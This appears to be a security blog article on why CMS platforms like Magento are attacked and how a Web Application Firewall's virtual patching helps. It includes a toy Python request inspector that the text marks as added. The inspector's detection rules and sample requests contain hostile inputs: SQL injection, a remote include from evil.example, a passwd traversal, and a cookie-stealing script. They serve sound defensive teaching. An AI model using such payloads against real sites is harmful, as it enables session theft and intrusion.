To the uninitiated, a Content Management System (CMS) might not sound quite as important as it actually is. A CMS is a software application responsible for the creation and modification of digital content. That could be anything from WordPress, the popular website and blog building platform, to an e-commerce platform such as Shopify. It allows individuals and businesses to build and maintain web pages without requiring specialized technical knowledge. CMS are powerful, easily customizable, and incredibly fast to use, allowing a person to build a web presence in just a couple of hours. Because of this ease of use, many websites, and the businesses and organizations behind them, rely on a CMS every day.
It’s therefore no surprise that CMS are frequently targeted by hackers. This is because of their importance, their widespread usage, and the relatively low barrier to entry for attackers. That low barrier has two causes. First, most popular CMS are open source, so their code can be studied by attackers as well as defenders, and once a flaw is disclosed, public proof-of-concept exploits and mass scanners usually follow within days. Second, because many thousands of websites share the same codebase, one vulnerability is inherited by every site built on that CMS, so a single exploit can be reused against all of them. Hackers scanning the internet for such flaws can use them to quickly gain admin access to a website and then use that privileged access to deface the site, steal information, or distribute malware. This is why vulnerabilities in a CMS can have far-reaching, devastating consequences.
Here’s why a tool like a Web Application Firewall (WAF) can help.
Attacks target CMS vulnerabilities
There’s no shortage of examples of how CMS vulnerabilities can impact websites. A recent one affected Magento Commerce and Magento Open Source, an e-commerce platform written in PHP. These vulnerabilities were rated as “important” and “critical” severity. They allowed an attacker who already had administrative privileges to execute arbitrary code, meaning that a bad actor could run any command they chose on the target system. That could be anything from stealing sensitive data to using the compromised server to launch denial of service (DoS) attacks that overload other systems with bogus traffic. Another related vulnerability made it possible for attackers with admin privileges to bypass signature verification.
Attacks that inject card-skimming code into online checkout pages are called Magecart attacks, after Magento, the shopping cart platform they originally and most often target. The skimmer copies payment card details as customers type them in and sends them to a server the attacker controls. If a hacker is able to compromise this data stream, they have a card collection tool that can be incredibly damaging to both customers and vendors. Such attacks have, in the past, targeted SMBs (small and medium-sized businesses) as well as government agencies that process online payments. Multiple hacker groups focus on Magecart attacks, and they have been used against many thousands of online stores. Because of the frequency of these attacks, even the FBI has publicly recommended that vendors keep their software updated as one means of mitigating them.
Security updates are a must
Fortunately, in the case of the recently discovered Magento Commerce and Magento Open Source vulnerabilities, Magento owner Adobe quickly issued software updates that fixed the code execution vulnerabilities. Vendors running the affected Magento versions were advised to update to the latest release as quickly as possible to secure their systems.
But not every vulnerability is guaranteed to be spotted by the good guys before it’s sniffed out by bad actors. Once attackers find one first, because of how widespread CMS are, the resulting attacks can get very nasty, very quickly. (And no matter how quickly updates are issued, they only help once people actually install them.)
Today, it’s essential that website security is taken deadly seriously. Keeping a CMS, website, web applications, and web APIs patched is a challenge for both the companies that make the software and the customers who use it. Fortunately, there is an additional layer of defense that can help keep you safe while you rely on a CMS, as more and more people do every day.
WAF can help
This is where a Web Application Firewall (WAF) comes into play. A WAF can provide virtual patching: it detects, and more importantly blocks, attempted exploitation of vulnerabilities that have not yet been patched in the application itself. It buys time until the real patch is installed rather than replacing it.
It does this by inspecting every incoming request to the application and stopping some of the web’s most damaging attack classes, such as SQL injection, remote file inclusion, illegal resource access (for example path traversal), cross-site scripting, and more. The goal is to accurately block exploitation attempts before they reach the vulnerable code, while minimizing false positives that would hurt legitimate users.
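The following toy request inspector is an added illustration of the mechanism just described; it is not code from the original article or from any WAF product. It normalizes each parameter (undoing double URL-encoding, a common evasion), runs a small set of signature rules for the attack classes named above, and includes one hypothetical virtual-patch rule for a made-up endpoint `/rest/v1/export` whose `format` parameter is allowlisted until the application is fixed. The rule IDs, endpoint and the sample requests are all constructed for the example.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

@dataclass
class Request:
    method: str
    path: str
    params: Dict[str, str]   # query/body parameters, raw (still URL-encoded)

@dataclass
class Rule:
    rid: str
    description: str
    paths: Optional[re.Pattern]        # restrict rule to matching paths (None = all)
    param_names: Optional[re.Pattern]  # restrict rule to matching parameter names
    test: Callable[[str], bool]        # runs on the normalized parameter value

def normalize(value: str) -> str:
    """URL-decode up to twice and lowercase, so %2527 -> %27 -> ' is inspected
    in decoded form. Real WAFs also handle Unicode, HTML entities and nulls."""
    out = value
    for _ in range(2):
        decoded = urllib.parse.unquote_plus(out)
        if decoded == out:
            break
        out = decoded
    return out.lower()

def matches(pattern: str) -> Callable[[str], bool]:
    rx = re.compile(pattern)
    return lambda v: rx.search(v) is not None

RULES: List[Rule] = [
    # Tautology (' or '1'='1), UNION SELECT, trailing comment, stacked statement.
    Rule("SQLI-1", "SQL injection", None, None,
         matches(r"union\s+(all\s+)?select|'\s*or\s+'?\w+'?\s*=\s*'?\w+|--(\s|$)|;\s*(drop|insert|update|delete)\s")),
    # Only file-like parameters: a URL in 'referer' or 'return_url' is normal traffic.
    Rule("RFI-1", "Remote/stream-wrapper include", None,
         re.compile(r"^(file|page|include|template|path|module)$"),
         matches(r"^(https?|ftp|php|data|expect)://")),
    Rule("LFI-1", "Path traversal / illegal resource access", None, None,
         matches(r"\.\./|\.\.\\|/etc/passwd|/proc/self/")),
    Rule("XSS-1", "Cross-site scripting", None, None,
         matches(r"<script\b|javascript:|\bon(load|error|mouseover)\s*=")),
    # HYPOTHETICAL virtual patch: until the app is updated, only csv/json may
    # reach /rest/v1/export?format=...  (positive-security allowlist, not a signature)
    Rule("VP-0001", "Virtual patch: /rest/v1/export format allowlist",
         re.compile(r"^/rest/v1/export$"), re.compile(r"^format$"),
         lambda v: v not in ("csv", "json")),
]

def inspect(req: Request) -> List[str]:
    """Return the IDs of every rule the request triggers (empty = clean)."""
    hits = []
    for rule in RULES:
        if rule.paths and not rule.paths.match(req.path):
            continue
        for name, raw in req.params.items():
            if rule.param_names and not rule.param_names.match(name):
                continue
            if rule.test(normalize(raw)):
                hits.append(rule.rid)
                break  # one hit per rule is enough
    return hits

def decide(req: Request) -> str:
    return "BLOCK" if inspect(req) else "ALLOW"

# Constructed sample traffic for the example (not captured from a real site).
SAMPLES: Dict[str, Request] = {
    "legit_search":   Request("GET", "/catalogsearch/result/", {"q": "credit union near me"}),
    "sqli":           Request("GET", "/catalogsearch/result/", {"q": "1' OR '1'='1"}),
    "sqli_double_enc": Request("GET", "/catalogsearch/result/",
                               {"q": "1%2527%2520OR%2520%25271%2527%253D%25271"}),
    "rfi":            Request("GET", "/index.php", {"page": "http://evil.example/shell.txt"}),
    "legit_redirect": Request("GET", "/customer/account/login",
                              {"referer": "https://shop.example/checkout"}),
    "traversal":      Request("GET", "/media/download", {"file": "../../../../etc/passwd"}),
    "xss":            Request("GET", "/catalogsearch/result/",
                              {"q": "<script>document.location='http://x/?c='+document.cookie</script>"}),
    "vpatch_ok":      Request("GET", "/rest/v1/export", {"format": "csv"}),
    "vpatch_block":   Request("GET", "/rest/v1/export", {"format": "phtml"}),
}

def run_samples() -> Dict[str, List[str]]:
    return {label: inspect(req) for label, req in SAMPLES.items()}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(f"{decide(req):5} {label:16} {req.path} {req.params} hits={inspect(req)}")
```

Two design points worth noticing: the search for "credit union" passes because the SQL rule requires `union` to be followed by `select`, and the legitimate `referer` URL passes because the remote-include rule is scoped to file-like parameter names. Both are how a WAF keeps false positives down. Production WAFs use far larger rule sets (the OWASP ModSecurity Core Rule Set is the best-known open one) and typically combine rule hits into an anomaly score rather than blocking on a single match.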
The end result is that you get to keep reaping the benefits of the world’s most popular Content Management Systems with far less worry, and in most cases without having to think about individual threats at all. Like any good alarm system, it lets you feel comfortable that you are protected while you keep up with updates. Because, really, shouldn’t anyone running a business or other organization have other things they’d sooner be focusing their attention on?
Hackers are going to keep going after CMS. Thanks to tools such as WAFs, however, you’re in a much better position to stop them hitting you where it hurts. A WAF is a “must have” for anyone who uses a CMS as part of their workflow.